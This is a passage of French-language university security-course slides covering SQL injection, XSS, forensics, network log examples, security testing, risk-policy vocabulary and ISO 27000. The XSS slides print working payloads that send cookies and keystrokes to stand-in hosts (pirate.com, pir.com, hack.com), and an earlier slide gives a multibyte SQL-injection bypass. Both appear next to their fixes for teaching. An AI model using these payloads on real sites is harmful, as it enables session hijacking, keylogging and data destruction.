avec les caractères dits "multibytes" : c’est à dire les alphabets
plus complexes (chinois par exemple)
A la place de la quote, plaçons le caractère multibyte ’0xbf27’ .
Cela ne peut réellement se faire que par un script :
Parlons chinois
$id=chr(0xbf).chr(0x27)." OR 1=1";
fopen(http://192.168.30.72/test_sql.php?id=$id)";

[email protected] Sécurité Informatique/ March 2, 2020 344 / 459


MUV : Les injections SQL troisième attaque

Le PHP reçoit un caractère multibyte chinois 0xbf27


Il l’envoie à addslashes (ou à magic_quotes_gpc, ce qui est
identique)
Celui-ci ne comprenant pas que c’est un caractère multibytes,
croit voir 2 caractères : 0xbf et 0x27 qui est une quote. Il
ajoute à 0x27 un antislash (0x5c).
La chaine renvoyée à PHP est donc 0xbf5c27.
Comme PHP renvoie à MySQL qui lui comprend le multibyte
(si la BD est en UTF8), et que 0xbf5c est un caractère
valide, il nous reste 0x27 qui est... la quote.

[email protected] Sécurité Informatique/ March 2, 2020 345 / 459


MUV : Les injections SQL troisième attaque

On obtient alors la chaine suivante :


Chaine envoyée au SGBD
DELETE FROM matable WHERE id=’3 ’ OR 1=1’
Le résultat est encore la destruction de tous les enregistrements.
Solutions :
mysql_real_escape_string().
les requêtes préparées.

[email protected] Sécurité Informatique/ March 2, 2020 346 / 459


Et si c’était possible ?

[email protected] Sécurité Informatique/ March 2, 2020 347 / 459


Et bien si en fait !

Je fais le malin.

[email protected] Sécurité Informatique/ March 2, 2020 348 / 459


MUV : Les variables de session

Les variables de session permettent de mettre les variables


habituellement mises en cookies, uniquement sur le serveur
Cela évite de trimbaler beaucoup d’informations.
On n’a plus à les contrôler à chaque fois (elles ne sont plus
modifiables).
Seule reste une variable dans le cookie : celle qui contient le
numéro de session. En général, cette variable est équivalente à un
identifiant (on ne réauthentifie plus la personne).
Pour un pirate, c’est le cookie à obtenir.

[email protected] Sécurité Informatique/ March 2, 2020 349 / 459


MUV : Voler un cookie : Attaque

Soit un forum avec une zone de texte quelconque.


Si on saisit
Salut les potes, le cours est génial, le prof est <B>super</B>.
Reviendez....
On obtient donc
Salut les potes, le cours est génial, le prof est super.
Reviendez....

[email protected] Sécurité Informatique/ March 2, 2020 350 / 459


MUV : Voler un cookie : Problème

Et si on saisit ?
<script>
while (1)
alert("Vas téter la prise électrique");
</script>

[email protected] Sécurité Informatique/ March 2, 2020 351 / 459


MUV : Voler un cookie : Problème

Soyons plus méchant :


Récupérons le cookie
<script>
cookie=document.cookie();
i=new image();
i.src="http://www.pirate.com/?id="+cookie;
</script>

[email protected] Sécurité Informatique/ March 2, 2020 352 / 459


MUV : Voler un cookie : Solution

Bloquer la chaine "<script" dans les messages.

[email protected] Sécurité Informatique/ March 2, 2020 353 / 459


MUV : Voler un cookie : Vraiment la solution ?

Comment s’écrit script ?


"<script"
"<javascript"
"<JAVAscript"
"<java script"
"<java
script
et ça ?
<&#00015;&#099;&#00015;&#x72;&#0000105;&#x070;&#x0074;>

[email protected] Sécurité Informatique/ March 2, 2020 354 / 459


MUV : Pire encore ?

un javascript s’appelle aussi par


Par erreur
<img src=Y onerror="document.location= ’http://pir.com/vol?ck=’+document.cookie"

Spécifique IE
<bgsound onpropertychange="code Javascript">

[email protected] Sécurité Informatique/ March 2, 2020 355 / 459


MUV : XSS = solution globale

Il faut utiliser sur toutes les variables externes


GET, POST,
HTTP_REFERER, HTTP_USER_AGENT
dans les Cookies (même si on les a déjà contrôlées)
la fonction htmlentities().

[email protected] Sécurité Informatique/ March 2, 2020 356 / 459


MUV : XSS = vol de cookie ?

Ce n’est qu’une possibilité, par la transformation du navigateur.


Mais en quoi ?

[email protected] Sécurité Informatique/ March 2, 2020 357 / 459


En outil de DOS HTTP : JS-LOIC

[email protected] Sécurité Informatique/ March 2, 2020 358 / 459


Et moi ?

<script language="javascript">
var keys=’’;
document.onkeypress = function(e) {
get = window.event?event:e;
key = get.keyCode?get.keyCode:get.charCode;
key = String.fromCharCode(key);
keys+=key;
}
window.setInterval(function(){
new Image().src = ’http://hack.com/keylogger.php?c=’+keys;
keys = ’’;
}, 1000);
</script>

[email protected] Sécurité Informatique/ March 2, 2020 359 / 459


Et si on intégrait tout ça ?

http://www.beefproject.com

[email protected] Sécurité Informatique/ March 2, 2020 360 / 459


Un constat difficile

Un constat
beaucoup d’applications sont livrées "telles quelles"
il y a souvent un historique lourd
les applications sont "mouvantes".
les développeurs ne sont pas souvent formés.

[email protected] Sécurité Informatique/ March 2, 2020 361 / 459


Des solutions globales

D’où des solutions "globales"


des IPS réseau pour bloquer
des modules de sécurité
en négatif : mod_security (apache)
en positif : naxsi (nginx)
parfois directement sur le serveur à protéger
souvent utilisés en reverse-proxy.

[email protected] Sécurité Informatique/ March 2, 2020 362 / 459


L’authentification

Différence identification et authentification


Multi-facteurs ou pas
Sur quels périmètres
Accès aux machines
Accès aux applications
Accès au réseau
SSO : Same Sign On ou Single Sign On ?

[email protected] Sécurité Informatique/ March 2, 2020 363 / 459


Méthodes d’authentification

Locale (Fichiers, SQL)


Radius (historique, multiprotocoles, AAA)
LDAP et Active Directory (parfois en backend)
Kerberos (SSO général, mal implémenté par Microsoft)
SSO Web Intra-organisation (CAS)
SSO Trans-organisations (Shibboleth, Oauth)

[email protected] Sécurité Informatique/ March 2, 2020 364 / 459


Les mécanismes physiques

Ce que l’on a
FIDO et Yubikey
RSA SecurID
Ce que l’on est
lecture d’empreintes digitales (ou de carte veineuse)
lecture d’iris de l’oeil
reconnaissance du visage
vitesse de frappe sur les touches

[email protected] Sécurité Informatique/ March 2, 2020 365 / 459


Définition et objectifs

Le "forensic computing", parfois abrégé en "forensic" est un terme


anglosaxon reprenant le terme de "médecine légale".
Deux buts sont poursuivis dans le "forensic" ou la "forensique".
Comprendre ce qui s’est passé (comprendre, apprendre, réagir)
Récupérer des preuves ce qui peut se décomposer en
Récupérer des arguments (informels, non juridiques)
Se défendre (devant la justice, ou dans le cadre du RGPD)
Porter plainte
Ces 2 objectifs principaux peuvent être contradictoires (une
réaction rapide entrainant parfois un allégement du cadre formel)

[email protected] Sécurité Informatique/ March 2, 2020 366 / 459


Mécanismes

Précaution initiale : Nous ne sommes pas toujours sur que le


problème soit une intrusion. Des problèmes entre la chaise et le
clavier génèrent souvent plus de dégâts qu’un pirate. Cependant,
nous devons considérer le cas le pire : le piratage informatique.
Toute agression informatique laisse des traces
Ces traces peuvent être effacées (efficacement ou non) par le
pirate
L’investigation doit éviter au maximum de "piétiner la scène
de crime"

[email protected] Sécurité Informatique/ March 2, 2020 367 / 459


Mécanismes en cas de juridique

Les juges sont des humains comme les autres : aussi


(in)compétent en informatique
Les juges peuvent se faire assister par des experts judiciaires
(souvent) compétents
Les avocats "adverses" tenteront de dénigrer la valeur de vos
preuves.
Ce qui veut dire
Eviter au maximum d’écrire sur le matériel analysé (pour
permettre de faire une contre-expertise propre)
Marquer et dater toutes vos actions.
Si possible, faites une empreinte (hash) des données (images
etc.)

[email protected] Sécurité Informatique/ March 2, 2020 368 / 459


Mécanismes génériques

La récupération :
froide ou chaude ? morte ou vivante ? In vivo, In vitro ?
De toute manière, cela se prépare.
physiquement (du matériel, des logiciels)
intellectuellement (des procédures, de l’entrainement)
psychologiquement (de l’entrainement)
juridiquement (un règlement intérieur, une analyse juridique)

[email protected] Sécurité Informatique/ March 2, 2020 369 / 459


L’analyse chaude

C’est quoi ?
On laisse l’intrusion se dérouler
On analyse le plus en direct possible ce qui se passe
Capture de la mémoire à un instant T
Analyse des flux réseaux (sonde, etc.)
Analyse des actions
Tentative d’interception de ce trafic

[email protected] Sécurité Informatique/ March 2, 2020 370 / 459


L’analyse chaude

Pourquoi ?
Le pirate a sans doute déjà fait du déplacement latéral
On peut comprendre ce qu’il sait et récupérer des IoC
(indicateurs de compromission) que l’on utilisera plus tard
On pourra toujours faire de l’analyse froide après.
Pourquoi pas ?
C’est dangereux (risque de perte de preuves)
Cela nécessite des compétences plus élevées
Cela nécessite des matériels et logiciels adaptés
Il faut mettre en place des procédures de protection "en live"
et sans trop alerter le pirate
C’est très très stressant.

[email protected] Sécurité Informatique/ March 2, 2020 371 / 459


L’analyse froide

C’est quoi ?
On coupe tout
On analyse sereinement les disques, les journaux et les traces.
Pourquoi ?
C’est moins risqué pour le SI (cryptolockeur destructeur de
sauvegardes)
C’est moins compliqué.
C’est moins risqué pour les preuves.
Pourquoi pas ?
On va perdre des informations

[email protected] Sécurité Informatique/ March 2, 2020 372 / 459


L’analyse tiède

C’est quoi ?
Tout ce qui peut-être entre les deux
Pourquoi ?
Parce que rien n’est absolu
Comment ?
Cela va dépendre de la situation.
Passer en hibernation les postes compromis (on conserve une
partie de l’image de la mémoire) pour l’envoyer à un
prestataire.
Complètement "firewaller" la zone compromise et bloquer.
etc.

[email protected] Sécurité Informatique/ March 2, 2020 373 / 459


Effacer est-il réellement efficace ?

TP : Clé USB
Outils
photorec
recuva

[email protected] Sécurité Informatique/ March 2, 2020 374 / 459


La copie de la mémoire

Outils
Directe : dump2it
Indirecte (hibernation) : hib2dmp

[email protected] Sécurité Informatique/ March 2, 2020 375 / 459


L’analyse de la mémoire

Outils
Volatility (sous linux)

[email protected] Sécurité Informatique/ March 2, 2020 376 / 459


Les copies de disque

Les copieurs "write blockers" hardware


version chère
version pas chère
Les copieurs "nowrite" logiciels
driver linux opensource
logiciel commercial

[email protected] Sécurité Informatique/ March 2, 2020 377 / 459


L’analyse de disque

TP : Caine & Lazagne


Outils
Caine
Lazagne
Autopsy

[email protected] Sécurité Informatique/ March 2, 2020 378 / 459


Les traces réseau

Journalisez tout ce que vous pouvez !


En central.
Sur un serveur "invulnérable"
Avec une horloge fiable.

[email protected] Sécurité Informatique/ March 2, 2020 379 / 459


Schéma d’un réseau classique

[email protected] Sécurité Informatique/ March 2, 2020 380 / 459


Schéma d’une connexion classique

[email protected] Sécurité Informatique/ March 2, 2020 381 / 459


Les traces réseau : quoi ?

Les authentifications
Les méta-données de communications
Les "indicateurs" de communication
C’est souvent HAUTEMENT réglable.

[email protected] Sécurité Informatique/ March 2, 2020 382 / 459


Les traces réseau : les communications firewall(argus)

00:23:55.468878 e tcp 193.49.48.244.62165 -> 162.125.34.137.https 16 6481 CON 00:23:55.476641 e tcp


10.26.666.666.43132 <?> 15.72.162.54.https 2 206 CON 00:23:55.479878 e udp 10.17.666.666.37776 <->
172.217.19.131.https 10 3975 CON 00:23:55.480635 e tcp 109.236.666.666.55253 -> 193.49.48.125.http
24 33916 FIN 00:23:55.484520 e tcp 60.50.666.666.59130 -> 193.49.48.249.https 22 10317 RST 00:23:55.498224
e tcp 62.125.666.666.https <?> 193.49.48.244.43003 4 1500 CON 00:23:55.530973 e tcp 193.49.666.666.64901
-> 34.211.202.13.https 15 5439 CON

[email protected] Sécurité Informatique/ March 2, 2020 383 / 459


Les traces réseau : les blocages firewall

Feb 27 06:24:09 fenrir kernel: IN=eth0 OUT= MAC=82:45:d3:c8:e9:04:64:c3:d6:55:4f:43:08:00


SRC=117.64.149.123 DST=193.49.53.91 LEN=40 TOS=0x00 PREC=0x00 TTL=49 ID=17762
PROTO=TCP SPT=9123 DPT=22 WINDOW=48279 RES=0x00 SYN URGP=0
Feb 27 06:24:09 fenrir kernel: IN=eth0 OUT= MAC=82:45:d3:c8:e9:04:64:c3:d6:55:4f:43:08:00
SRC=218.156.38.185 DST=193.49.52.96 LEN=40 TOS=0x00 PREC=0x00 TTL=48 ID=57510
PROTO=TCP SPT=38809 DPT=23 WINDOW=46009 RES=0x00 SYN URGP=0 MARK=0x1
Feb 27 06:24:09 fenrir kernel: IN=eth0 OUT= MAC=82:45:d3:c8:e9:04:64:c3:d6:55:4f:43:08:00
SRC=139.199.86.132 DST=193.49.54.73 LEN=60 TOS=0x00 PREC=0x00 TTL=46 ID=5136 DF
PROTO=TCP SPT=55378 DPT=22 WINDOW=14600 RES=0x00 SYN URGP=0
Feb 27 06:24:09 fenrir kernel: IN=eth0 OUT= MAC=82:45:d3:c8:e9:04:64:c3:d6:55:4f:43:08:00
SRC=103.79.115.136 DST=194.254.255.96 LEN=52 TOS=0x00 PREC=0x00 TTL=51 ID=40452 DF
PROTO=TCP SPT=56633 DPT=2323 WINDOW=14600 RES=0x00 SYN URGP=0

[email protected] Sécurité Informatique/ March 2, 2020 384 / 459


Les traces réseau : le proxy

1550976502.075 116 10.26.666.666 TCP_MISS/200 2113 POST


http://dmd.metaservices.microsoft.com/dms/metadata.svc - HIER_DIRECT/52.138.148.89 text/xml
1550976502.118 36 10.26.666.666 TCP_MISS/302 428 POST
http://go.microsoft.com/fwlink/?LinkID=109572&clcid=0x409 - HIER_DIRECT/23.200.167.226 -
1550975385.578 42 194.254.666.666 TCP_MISS/206 1042635 GET
http://r1–-sn-gxo5uxg-jqbe.gvt1.com/edgedl/release2/chrome_component
HYK6mjXA8u8_32.0.0.142/32.0.0.142_win64_PepperFlashPlayer.crx3?cms_redirect=yes&mip=193.49.48.244
&mm=28&mn=sn-gxo5uxgjqbe&ms=nvh&mt=1550975066&mv=u&pl=20&shardbypass=yes -
HIER_DIRECT/193.51.224.140 application/octet -stream
1550975490.272 60239 10.26.666.666 TCP_TUNNEL/200 4135 CONNECT vortex-win.data.microsoft.com:443 -
HIER_DIRECT/40.77.226.250 -
1550975878.275 60233 10.26.666.666 TCP_TUNNEL/200 3960 CONNECT settings-win.data.microsoft.com:443 -
HIER_DIRECT/52.138.216.83 -

[email protected] Sécurité Informatique/ March 2, 2020 385 / 459


Les traces réseau : le serveur WWW

157.55.666.666 - - [25/Feb/2019:06:34:33 +0100] "GET /robots.txt HTTP/1.1" 200 489 "-"


"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.666.666 - - [25/Feb/2019:06:34:39 +0100] "GET / HTTP/1.1" 200 21123 "-"
"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
176.158.666.666 - - [25/Feb/2019:06:35:06 +0100] "GET /proxy.pac HTTP/1.1" 200 106 "-"
"CFNetworkAgent (unknown version) CFNetwork/902.3.1 Darwin/17.7.0 (x86_64)"
40.77.666.666 - - [25/Feb/2019:06:48:12 +0100] "GET /css/fond.png HTTP/1.1" 200 45875 "-"
"Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko)
Version/7.0 Mobile/11A465 Safari/9537.53 BingPreview/1.0b"
66.249.666.666 - - [25/Feb/2019:06:50:44 +0100] "GET /images/blue.gif HTTP/1.1" 304 - "-"
"Googlebot-Image/1.0"
46.229.666.666 - - [25/Feb/2019:06:48:09 +0100] "GET /doc/reseau/wifi/mode_securise?do=media&ns=
reseau%3Awifi&tab_files=upload HTTP/1.1" 200 8124 "-"
"Mozilla/5.0 (compatible; SemrushBot/3~bl; +http://www.semrush.com/bot.html)"

[email protected] Sécurité Informatique/ March 2, 2020 386 / 459


Les traces réseau : Le DNS

07-Feb-2019 05:49:40.776 client @0x7f48aa8ebad0 192.168.3.196#44561 (activate.xirrus.com): query:


activate.xirrus.com IN A + (193.49.48.250)
07-Feb-2019 05:49:40.779 client @0x7f48aa8ebad0 192.168.3.196#40610 (activate.xirrus.com): query:
activate.xirrus.com IN A + (193.49.48.250)
07-Feb-2019 05:49:40.794 client @0x7f48aa8ebad0 10.16.2.203#60972 (proxmox-backup-ns.ut-capitole.fr):
query: proxmox-backup-ns.ut-capitole.fr IN A + (193.49.48.250)
07-Feb-2019 05:49:40.807 client @0x7f48aa8ebad0 10.16.2.203#47493 (proxmox-app-ns.ut-capitole.fr):
query: proxmox-app-ns.ut-capitole.fr IN A + (193.49.48.250)
07-Feb-2019 05:49:40.867 client @0x7f48aa8ebad0 10.2.36.237#61548 (ctldl.windowsupdate.com): query:
ctldl.windowsupdate.com IN A + (193.49.48.250)

[email protected] Sécurité Informatique/ March 2, 2020 387 / 459


Les traces réseau : un AD

2 Oct 17 15:08:11 isengard2.univ-tlse1.fr Security-Auditing: 4662: AUDIT_SUCCESS


Une opération a été effectuée sur un objet. Sujet : ID de sécurité :
S-1-5-21-3578475232-3819614856-2404772047-52163 Nom du compte : prigent Domaine du
compte : AD ID d’ouverture de session : 0x1EB53A4 Objet : Serveur de l’objet : DS Type d’objet :
%f30e3bc2-9ff0-11d1-b603-0000f80367c1 Nom de l’objet : %14d3bd37-cb93-4a0b-a4b6-650ccf8319f3
ID du handle : 0x0 Opération : Type d’opération : Object Access Accès : Propriété d’écriture
Masque d’accès : 0x20 Propriétés :
Propriété d’écriture 771727b1-31b8-4cdf-ae62-4fe39fadf89e bf967a76-0de6-11d0-a285-00aa003049e2
32ff8ecc-783f-11d2-9916-0000f87a57d4 f30e3bc2-9ff0-11d1-b603-0000f80367c1
Informations supplémentaires : Paramètre 1: - Paramètre 2 :

[email protected] Sécurité Informatique/ March 2, 2020 388 / 459


Les traces réseau : la messagerie

Feb 7 06:45:29 idavoll.univ-tlse1.fr postfix/qmgr[1960]: 99C361CA8428: from=<[email protected]>,


size=6245, nrcpt=1 (queue active)
Feb 7 06:45:29 idavoll.univ-tlse1.fr postfix/smtpd[1956]: disconnect from
mail.vanuatu.gov.vu[103.7.197.67]
Feb 7 06:45:29 tyr.univ-tlse1.fr dspam[2986]: innocent message from 103.7.197.67
Feb 7 06:45:29 idavoll.univ-tlse1.fr lmtp[17514]: sieve redirected: <[email protected]>
to: [email protected]
Feb 7 06:45:29 idavoll.univ-tlse1.fr lmtp[17514]: Delivered: <[email protected]>
to mailbox: user.toto
Feb 7 06:45:29 idavoll.univ-tlse1.fr postfix/pickup[10644]: B42E61CA84CC: uid=76
from=<[email protected]>
Feb 7 06:45:29 idavoll.univ-tlse1.fr postfix/cleanup[17040]: B42E61CA84CC: message
-id=<[email protected]>
Feb 7 06:45:29 idavoll.univ-tlse1.fr postfix/lmtp[2240]: 99C361CA8428: to=<[email protected]>,
orig_to=<[email protected]>, relay=193.49.48.222[193.49.48.222]:10024, delay=2.2,
delays=1.6/0/0.05/0.62, dsn=2.6.0, status=sent (250 2.6.0 <[email protected]> Message accepted
for delivery)
Feb 7 06:45:29 idavoll.univ-tlse1.fr postfix/qmgr[1960]: 99C361CA8428: removed
Feb 7 06:45:29 idavoll.univ-tlse1.fr postfix/qmgr[1960]: B42E61CA84CC: from=<[email protected]>,
size=7936, nrcpt=1 (queue active)
Feb 7 06:45:29 mass-mailing.univ-tlse1.fr postfix/smtpd[1514]: connect from
idavoll.univ-tlse1.fr[193.49.48.224]

[email protected] Sécurité Informatique/ March 2, 2020 389 / 459


Les traces : les aides à la preuve et à la détection

Les honeytokens (données fausses insérées par le propriétaire)


Les honeypots (faux serveurs créés par le propriétaire)

[email protected] Sécurité Informatique/ March 2, 2020 390 / 459


Vérifier sa sécurité

Vérifier sa sécurité.

[email protected] Sécurité Informatique/ March 2, 2020 391 / 459


Vérifier sa sécurité

Etre persuadé que sa sécurité est efficace n’est pas suffisant : il


faut à minima vérifier que cela correspond à la réalité.
Vérifier que les outils de sécurité sont actifs
Vérifier que les procédures de sécurité sont suivies
Permettre aux utilisateurs de découvrir leurs outils de sécurité
Vérifier notre e-réputation
Faire tester sa sécurité.

[email protected] Sécurité Informatique/ March 2, 2020 392 / 459


Vérifier que les outils de sécurité sont actifs

Vérifier les antivirus grâce http://eicar.com.


Déclenchent-ils des alertes sur le poste ?
sur le serveur de messagerie ?
sur le proxy web ?
Vérifier les ports ouverts grâce à ShieldUp de grc.com
Vérifier le niveau de chiffrement avec sslabs.com

[email protected] Sécurité Informatique/ March 2, 2020 393 / 459


Vérifier que les procédures sont actives

Les antivirus sont-ils à jour ? Comment le voit-on ?


Les infections virales remontent-elles sur la console centrale ?
Y-a-t-il des remontées d’alarmes (syslog par exemple) en cas
de problème ?
Les filtres d’url fonctionnent-ils ?
Les vérifications de procédures sont-elles régulières et
automatiques ?
etc.

[email protected] Sécurité Informatique/ March 2, 2020 394 / 459


Aider les utilisateurs à vérifier leur sécurité

Pourquoi ?
Leur montrer comment réagissent leurs outils de sécurité (et
ainsi éviter les "fake").
Leur faire prendre conscience de la sécurité,
Les rendre autonomes,
Les rendre "détecteurs d’incident".
Comment ?
Déclencher une alerte avec http://eicar.com pour l’antivirus
Tester le firewall local avec grc.com
Voir le repérage des spams, phishing, etc.

[email protected] Sécurité Informatique/ March 2, 2020 395 / 459


Vérifier son e-réputation

Pourquoi ?
Parce que c’est une valeur importante de l’entreprise,
Parce ce que cela peut faciliter ou compliquer voire interdire
la communication avec les clients.
Comment ?
Voir la réputation mail avec
mxtoolbox pour savoir si l’on est blacklisté
backscatter pour repérer nos refus de mails fautifs
chez CISCO
Voir la réputation web avec
chez McAfee
Avons nous une zone DNS propre ?

[email protected] Sécurité Informatique/ March 2, 2020 396 / 459


Les moteurs de recherche

Comment nous voit les moteurs de recherche et Internet ?


Google repère-t-il des .bak, .tmp, etc. chez nous ?
Quels sont les mots-clés associés à notre domaine ?
Peut-on trouver des failles de sécurité associées à nos sites
web ?

[email protected] Sécurité Informatique/ March 2, 2020 397 / 459


Faire tester sa sécurité

Mais tester soi-même n’est pas toujours suffisant : des entreprises


spécialisées sont là pour cela.
Ce sont des experts (souvent),
Ils ont les outils pour (et le droit de les utiliser),
Ils délivrent des rapports lisibles,
Ils savent ce qu’ils ont le droit de faire.
Règles chez Amazon

[email protected] Sécurité Informatique/ March 2, 2020 398 / 459


Faire tester sa sécurité

Mais attention :
Vérifiez que vous avez le droit de tester (serveur mutualisé ou
hébergé),
Vérifiez la compétence (réputation, autres clients, etc.),
Ne pas choisir l’option "je paye uniquement si vous trouvez"
(les 0days s’achètent !!!)
Définissez bien le périmètre (géographique, opérationnel,
temporel etc.),
TEST = RISQUE,
Plus vous en savez, mieux vous serez servis.

[email protected] Sécurité Informatique/ March 2, 2020 399 / 459


Les sujets non traités

Par manque de temps, ces sujets n’ont pas été traités. Ils sont
indiqués afin que vous puissiez vous renseigner dessus.
Les VPN (IPSEC, VPN-SSL, openvpn)
La sécurisation d’une structure AD
La sécurisation des accès (filaire ou wifi)
Les portails captifs (et leurs limites avec le HTTPS)
Le 802.1x (avec le protocole EAP et surtout PEAP)
La gestion des spams
La gestion du phishing
Habituer ses utilisateurs
Limiter les dégâts (détection de l’origine des connexions)
La lutte antivirale
Les limites des antivirus
La détection et le blocage post-infection (DNS, Squidguard)

[email protected] Sécurité Informatique/ March 2, 2020 400 / 459


Définition de la PSSI

Politique de sécurité des systèmes d’information.


Elle décrit les moyens à employer pour atteindre un certain
niveau de sécurité du SI.
Elle est validée par la plus haute autorité hiérarchique de
l’organisme.
Son point central est l’information, pas l’informatique !

[email protected] Sécurité Informatique/ March 2, 2020 401 / 459


Définitions

Bien essentiel
Bien support
Evenement redouté
Besoin de sécurité
Source de menaces
Vulnérabilité
Impact
Vraisemblance
Gravité
source Guide Ebios ANSSI

[email protected] Sécurité Informatique/ March 2, 2020 402 / 459


Définitions

Critères DIC
Disponibilité
Intégrité
Confidentialité
Imputabilité (complément)
Traitement du risque
Refus du risque
Transfert du risque
Traitement du risque
Risque résiduel
Prise de risque

[email protected] Sécurité Informatique/ March 2, 2020 403 / 459


Définition : bien essentiel

(primary asset)
Ressource ayant une valeur pour l’organisme, voire être son
socle d’existence
Elle peut être matérielle (composant) ou immatérielle
(données, processus)
Elle est en général "portée" par un bien support
Elle a des besoins de sécurité
par exemple
Liste de clients
Données R&D
Données de santé
Capacité à fournir de l’accès Internet
Fournir des diplômes

[email protected] Sécurité Informatique/ March 2, 2020 404 / 459


Définition : bien support

Bien sur lequel reposent les biens essentiels


Il peut être matériel (serveurs informatiques, local, personne,
etc.)
ou immatériel (organisation, système d’information,
programme)
Il a des vulnérabilités
par exemple
Prestataire
Administrateur système
Réseau
Site web

[email protected] Sécurité Informatique/ March 2, 2020 405 / 459


Définition : événement redouté

Scénario "global" qui synthétise ce que craint le plus


l’organisme
par exemple
Un pirate manipule les données de santé de clients nécessaire à
leur survie, occasionnant l’hospitalisation ou la mort de
certains d’entre eux.
Les données de recherche sont volées par un concurrent qui
dépose un brevet.
Un hacktiviste récupère les documents de négociations avec un
partenaire ayant mauvaise presse et les diffuse sur Internet.

[email protected] Sécurité Informatique/ March 2, 2020 406 / 459


Définition : besoin de sécurité

Expression du besoin opérationnel suivant les critères DIC


par exemple
Système de freinage : ne doit pas être indisponible plus de
0,4ms
Serveur de messagerie : ne doit pas être indisponible plus de 2
heures
Somme de rachat d’un concurrent : ne doit être connu que de
la direction
Informations sanguines d’un patient : peut ne pas être intègre
tant que l’on peut le détecter

[email protected] Sécurité Informatique/ March 2, 2020 407 / 459


Définition : Source de menaces

Entité physique qui rend possible la réalisation d’un risque.


Cette entité est dotée de
d’un type (humain ou environnemental)
d’une expertise
d’une motivation
de ressources
par exemple
une tempête,
un concurrent,
un ancien expert du service informatiquee licencié,
un virus informatique.

[email protected] Sécurité Informatique/ March 2, 2020 408 / 459


Définition : vulnérabilité

fragilité d’un bien support pouvant entrainer la mise en défaut


d’un besoin de sécurité d’un bien essentiel.
par exemple
faille dans un serveur web
corruptibilité d’un employé
inconscience technique d’un personnel

[email protected] Sécurité Informatique/ March 2, 2020 409 / 459


Définition : vraisemblance

Probabilité de survenue d’un scenario de menace


par exemple
minime: ne devrait pas se produire
significative: pourrait se produire
forte: devrait se produire d’ici quelques temps
maximale: devrait se produire bientôt

[email protected] Sécurité Informatique/ March 2, 2020 410 / 459


Définition : gravité

Niveau des effets d’un événement redouté


par exemple
négligeable : aucune difficulté à surmonter
limité : quelques difficultés (perte financière, de temps) pour
surmonter
importante : sérieuses difficultés (impact à plus long terme)
critique: insurmontable (survie menacée)

[email protected] Sécurité Informatique/ March 2, 2020 411 / 459


Définition : Exemple de graphe

[email protected] Sécurité Informatique/ March 2, 2020 412 / 459


Définition : impact

Conséquences d’un non respect des besoins de sécurité d’un


bien essentiel.
Directes ou indirectes
sur l’organisme ou son environnement (partenaires, etc.)
par exemple
perte de crédibilité internationale
perte d’un marché
perte d’un partenariat
arrêt du processus de paye
inondation de la salle machine

[email protected] Sécurité Informatique/ March 2, 2020 413 / 459


Définitions : Disponibilité

Les biens sont-ils accessibles au moment voulu ?


Echelle (très très dépendant du périmètre)
journée
demi-journée
demi-heure
Echelle : système de freinage
demi-seconde
dixième de seconde
millième de seconde

[email protected] Sécurité Informatique/ March 2, 2020 414 / 459


Définitions : Intégrité

Les biens sont-ils complets et exacts ?


Echelle
négligeable: peut ne pas être intègre
acceptable: peut ne pas être intègre, mais cela doit être
détecté. Ou bien la variation est mineure et ne gêne que peu
les utilisateurs.
intègre: doit être intègre.

[email protected] Sécurité Informatique/ March 2, 2020 415 / 459


Définitions : Confidentialité

Les biens sont-ils accessibles suivant des autorisations ?


Echelle
public: le bien essentiel est public
restreint: ne doit être accessible qu’à un groupe
confidentiel: ne doit être accessible qu’à certaines personnes
(direction, responsables, etc.)

[email protected] Sécurité Informatique/ March 2, 2020 416 / 459


Définition : Refus du risque

On sort de la situation à risque


par exemple
Sortie d’un pays en instabilité politique
Abandon d’un projet de site web
Mise au placard d’un employé indélicat plutôt que licenciement.

[email protected] Sécurité Informatique/ March 2, 2020 417 / 459


Définition : Transfert du risque

Utilisation d’un partenaire qui va prendre le risque à notre


place.
par exemple
Passage par un partenaire local dans le pays en instabilité
Création du site web par un partenaire certifié sécurité
Achat d’une assurance.

[email protected] Sécurité Informatique/ March 2, 2020 418 / 459


Définition : Traitement du risque

Parfois appelé atténuation du risque


Mise en place de processus visant à réduire
la vraisemblance du risque
les impacts du risque
par exemple
Embauche d’une société de protection militaire
Achat d’un WAF de haut niveau
Négociation d’une prime de départ conséquente

[email protected] Sécurité Informatique/ March 2, 2020 419 / 459


Définition : Risque résiduel

Après toutes les mesures de transferts et d’atténuation ou


suppression, il existe souvent un risque réduit. C’est le risque
résiduel.

[email protected] Sécurité Informatique/ March 2, 2020 420 / 459


Définition : Prise de risque

Parfois appelé acceptation du risque


Le risque est considéré comme faible par rapport au bénéfice,
donc on y va.

[email protected] Sécurité Informatique/ March 2, 2020 421 / 459


Comment rédiger une PSSI ?

Quels sont les biens essentiels de l’organisme ?


Quels sont les biens support de ces biens essentiels ?
Quelles sont les vulnérabilités de ces biens support ?
Quels sont les sources de menaces ?
Quels sont les impacts ?
Quelles sont les vraisemblances ?
Quels sont les risques ?

[email protected] Sécurité Informatique/ March 2, 2020 422 / 459


Les normes sécurité

Les normes de sécurité

[email protected] Sécurité Informatique/ March 2, 2020 423 / 459


Les normes sécurité

Pourquoi ?
Besoin de définir des bonnes pratiques (pas de notion d’absolu
!)
Besoin de parler de la même chose
Besoin de certification (évaluation) commune
Evaluation des hommes (pour le recrutement)
Evaluation des entreprises (pour la publicité, ou les cercles de
confiance)
Appliquer à la sécurité les principes de la qualité

[email protected] Sécurité Informatique/ March 2, 2020 424 / 459


La qualité

C’est quoi ?
Tradition anglo-saxonne
Objectif : s’améliorer, RIEN DE PLUS
Roue de deming (PDCA)
Plan : je prévois ce que je vais faire
Do : je fais ce que j’ai prévu
Check : je vérifie (mesure) que j’ai fait ce que j’ai prévu
Act : je constate ce qui n’a pas marché pour le corriger
On recommence
Concept associé aux normes ISO 9001
Ce sont des documents payants à récupérer sur le site de l’ISO
: 100 à 150 €

[email protected] Sécurité Informatique/ March 2, 2020 425 / 459


La qualité : sous-entendus

On écrit ce que l’on veut faire


On écrit ce que l’on fait
On définit des indicateurs pour mesurer ce que l’on fait
Le modèle PDCA s’applique de manière "fractale"

[email protected] Sécurité Informatique/ March 2, 2020 426 / 459


Les normes ISO 27000

Pourquoi ?
ISO 27000 : Le vocabulaire
ISO 27001 : Le système de gestion de la sécurité SMSI
ISO 27002 : Les bonnes pratiques de la sécurité
ISO 27003 : Installation d’un SMSI
